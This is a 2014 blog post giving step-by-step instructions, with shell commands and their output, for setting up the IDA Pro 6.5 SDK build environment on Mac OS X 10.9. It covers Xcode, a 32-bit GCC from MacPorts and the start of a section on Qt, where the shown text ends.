Setting up IDA SDK 6.5 on Mac OS X 10.9 (Mavericks) (newsoft's tech blog, published 2014-05-05)<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">(This blog post is a wrap-up of the thread I started on the </span><a href="https://www.hex-rays.com/forum/viewtopic.php?f=8&t=3554" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Hex-Rays support forum</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">)</span></div>
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Prerequisites</span></h2>
<br />
<ul style="margin-bottom: 0pt; margin-top: 0pt;">
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Mac OS X 10.9 (Mavericks)</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IDA Pro 6.5</span></div>
</li>
<li dir="ltr" style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; list-style-type: disc; text-decoration: none; vertical-align: baseline;"><div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IDA SDK (downloadable from </span><a href="https://www.hex-rays.com/products/ida/support/download.shtml" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">here</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> - the password should have been provided to you when you purchased IDA Pro)</span></div>
</li>
</ul>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ md5 idasdk65.zip</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">MD5 (idasdk65.zip) = 4afa4c11ae8480f0753d5b2f87b61213</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Note: if you would like to perform all the steps below within a virtual machine, it is perfectly legal to do so. Just use </span><a href="http://kb.vmware.com/selfservice/microsites/search.do?language=en_US&cmd=displayKC&externalId=2056798" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">VMware Fusion 6</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> to create a new virtual machine </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">from the local recovery partition</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. The same trick should work with Parallels, but I did not test it.</span></div>
<br />
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Installing GCC from MacPorts</span></h2>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The IDA SDK only compiles with a </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">32-bit GCC</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Unfortunately, OS X 10.9 and Xcode 5 </span><a href="https://developer.apple.com/library/ios/documentation/DeveloperTools/Conceptual/WhatsNewXcode/Articles/xcode_5_0.html#//apple_ref/doc/uid/TP40012953-SW8" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">do not provide GCC anymore</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, as Apple completely switched to LLVM (the </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gcc</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> command is only an alias). For the rest of this post, I will rely on GCC 4.7 as provided by </span><a href="http://www.macports.org/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">MacPorts</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> 2.2.1. Feel free to explore other options, such as </span><a href="http://brew.sh/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Homebrew</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">However</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, to download and build GCC from source, MacPorts itself requires a compiler! Therefore the proper installation order is:</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">1. Install the Apple C/C++ compiler</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">At this point, a “full” Xcode 5 install is required. Xcode can be downloaded from the App Store, or from the </span><a href="https://developer.apple.com/downloads/index.action" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Apple Developers site</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (the former requires a valid App Store account, whereas the latter only requires free registration). </span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">After installing it, do not forget to also get the command-line tools:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ xcode-select --install</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">… and to accept the Xcode EULA from the command line, in case you never started the GUI:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ sudo xcodebuild -license</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Confirm that LLVM has been properly installed:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ gcc --version</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Configured with: --prefix=/Library/Developer/CommandLineTools/usr --with-gxx-include-dir=/usr/include/c++/4.2.1</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Apple LLVM version 5.1 (clang-503.0.40) (based on LLVM 3.4svn)</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Target: x86_64-apple-darwin13.1.0</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Thread model: posix</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Confirm that the SDK has been properly installed (and keep that path, you will need it later on):</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ xcrun --sdk macosx --show-sdk-path</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX10.9.sdk</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Note: it is possible to install only the command-line tools, by simply typing </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gcc</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in a terminal or by getting them from </span><a href="https://developer.apple.com/downloads/index.action" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Apple Developers</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">. </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">However</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">, this will not install the OS X 10.9 SDK required by the IDA SDK later on.</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">2. Get MacPorts from </span><a href="http://www.macports.org/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">www.macports.org</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> (installer version 2.2.1 was the most recent available at the time of writing).</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You might need to log out and in again to get </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/opt/local/bin</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> in your PATH.</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">3. Install GCC from MacPorts.</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You will need the 32-bit flavor of GCC. This can be achieved in several ways:</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ sudo port install gcc47 +i386</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">… will only install the 32-bit version of GCC.</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ sudo port install gcc47 +universal</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">… will install all the architectures specified in </span><span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">/opt/local/etc/macports/macports.conf</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">In any case, you can grab a coffee. Building GCC from source could take </span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: italic; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">hours</span><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">.</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You might get the following warning if you did not install the “full” Xcode suite. It seems that you can safely ignore it for now, but remember that you will need the OS X 10.9 SDK later on anyway.</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ sudo port install gcc47 +universal</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Warning: xcodebuild exists but failed to execute</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: red; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Warning: Xcode does not appear to be installed; most ports will likely fail to build.</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">---> Computing dependencies for gcc47</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">…</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">---> Updating database of binaries: 100.0%</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">---> Scanning binaries for linking errors: 100.0%</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">---> No broken files found.</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">4. Do not forget to select the MacPorts version as the default GCC.</span></div>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ port select --list gcc</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Available versions for gcc:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">    mp-gcc47</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">    none (active)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ port select --set gcc mp-gcc47</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Selecting 'mp-gcc47' for 'gcc' succeeded. 'mp-gcc47' is now active.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">$ gcc --version</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">gcc (MacPorts gcc47 4.7.3_3+universal) 4.7.3</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Copyright (C) 2012 Free Software Foundation, Inc.</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">This is free software; see the source for copying conditions. There is NO </span><span style="font-family: 'Courier New'; font-size: 15px; line-height: 1.15; white-space: pre-wrap;">warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h2 style="line-height: 1.15; margin-bottom: 0pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: 'Trebuchet MS'; font-size: 21px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Setting up Qt</span></h2>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">IDA SDK depends on Qt, version 4.8.4. Qt header files are required for compiling “graphical” plugins.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">The “stock” </span><a href="http://download.qt-project.org/official_releases/qt/4.8/" style="text-decoration: none;"><span style="background-color: transparent; color: #1155cc; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;">Qt 4 source distribution</span></a><span style="background-color: transparent; color: black; font-family: Arial; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> will not build on Mac OS X 10.9:</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">…</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">util/qdeclarativefontloader.cpp:87:52: error: addition of default argument on redeclaration makes this constructor a default</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> constructor</span></div>
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: 'Courier New'; font-size: 15px; font-style: normal; font-variant: normal; font-weight: normal; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">QDeclarativeFontObject::QDeclarativeFontObject(int _id = -1)</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.15; margin-bottom: 0pt; margin-top: 0pt;">
